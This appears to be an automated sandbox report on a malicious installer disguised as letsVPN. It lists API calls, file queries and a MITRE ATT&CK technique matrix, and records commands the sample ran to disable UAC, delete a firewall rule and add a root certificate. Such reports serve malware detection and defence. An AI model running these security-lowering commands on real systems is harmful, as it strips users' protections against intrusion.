              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,memset,_getptd,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,_itow_s,19_2_6D129A96
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,wcslen,EnumSystemLocalesW,19_2_6D12950C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,wcslen,wcslen,_GetPrimaryLen,EnumSystemLocalesW,19_2_6D12954C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,wcslen,_GetPrimaryLen,EnumSystemLocalesW,19_2_6D1295C9
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,19_2_6D12945C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_006980E1
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_00698096
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_0069817C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,58_2_0069219D
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,58_2_00698207
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,58_2_0069845C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,58_2_00691CFD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,58_2_00697DF0
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,58_2_00698584
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,58_2_0069868C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,58_2_0069875F
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961920D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,33_2_00007FF7961920D8
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\letsvpn-latest.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeQueries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
              Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{a1287589-5177-bd45-adb1-516ad4522f2f}\tap0901.cat VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.Clientuser.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_0052F510 ??1LogMessage@logging@@QAE@XZ,CreateMutexW,CreateEventW,RegisterWaitForSingleObject,CreateNamedPipeW,SetEvent,19_2_0052F510
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000014006BC9C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_000000014006BC9C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0A8D59 _lock,__tzname,_get_timezone,_get_daylight,_get_dstbias,___lc_codepage_func,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,__timezone,__daylight,__dstbias,strcmp,free,strlen,_malloc_crt,strlen,strcpy_s,_invoke_watson,free,strncpy_s,atol,atol,atol,strncpy_s,__timezone,__daylight,19_2_6D0A8D59
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00521880 ??1FilePath@base@@QAE@XZ,?Base64Encode@base@@YAXABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z,??3@YAXPAX@Z,?ASCIIToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,memset,GetVersionExW,GetVersionExW,GetVersionExW,memset,VariantInit,VariantClear,VariantClear,VariantClear,?WideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,19_2_00521880
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: C:\Windows\System32\reg.exeRegistry value created: PromptOnSecureDesktop 0
              Source: C:\Windows\System32\reg.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob

              Stealing of Sensitive Information

              Source: C:\Windows\System32\svchost.exeRegistry value created:
              Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information; Determine Physical Locations
              Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server; Virtual Private Server
              Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain; Compromise Hardware Supply Chain
              Execution: 331 Windows Management Instrumentation; 1 Native API; 13 Command and Scripting Interpreter; 1 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
              Persistence: 1 Scripting; 1 LSASS Driver; 1 DLL Side-Loading; 3 Windows Service; 11 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
              Privilege Escalation: 1 LSASS Driver; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 Access Token Manipulation; 3 Windows Service; 13 Process Injection; 11 Registry Run Keys / Startup Folder; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
              Defense Evasion: 321 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Bypass User Account Control; 1 File Deletion; 42 Masquerading; 2 Modify Registry; 261 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 13 Process Injection
              Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging; GUI Input Capture
              Discovery: 2 System Time Discovery; 2 File and Directory Discovery; 178 System Information Discovery; 2 Query Registry; 361 Security Software Discovery; 2 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 21 System Network Configuration Discovery; Network Service Discovery; System Network Connections Discovery; Process Discovery; Permission Groups Discovery
              Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
              Collection: 1 Archive Collected Data; 11 Input Capture; 2 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture; Email Collection
              Command and Control: 2 Ingress Tool Transfer; 11 Encrypted Channel; 11 Non-Standard Port; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS; Proxy
